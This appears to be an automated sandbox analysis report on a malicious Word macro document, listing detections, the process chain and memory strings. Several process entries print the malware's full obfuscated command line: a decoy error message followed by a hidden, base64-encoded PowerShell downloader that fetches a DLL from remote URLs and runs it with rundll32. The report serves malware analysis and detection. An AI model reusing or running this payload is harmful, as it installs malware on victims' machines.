Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@22/8@6/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F1C88 CreateToolhelp32Snapshot,

13_2_001F1C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$IL-0573188.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmp

Jump to behavior

Source: MAIL-0573188.doc

OLE indicator, Word Document stream: true

Source: MAIL-0573188.doc	OLE document summary: title field not present or empty
Source: MAIL-0573188.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......(.Q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....xg......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j....................................}..v............0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL

Source: MAIL-0573188.doc	Virustotal: Detection: 66%
Source: MAIL-0573188.doc	Metadefender: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: MAIL-0573188.doc

Initial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: MAIL-0573188.doc	Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788			Name: Owppnp8hah4xo788

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 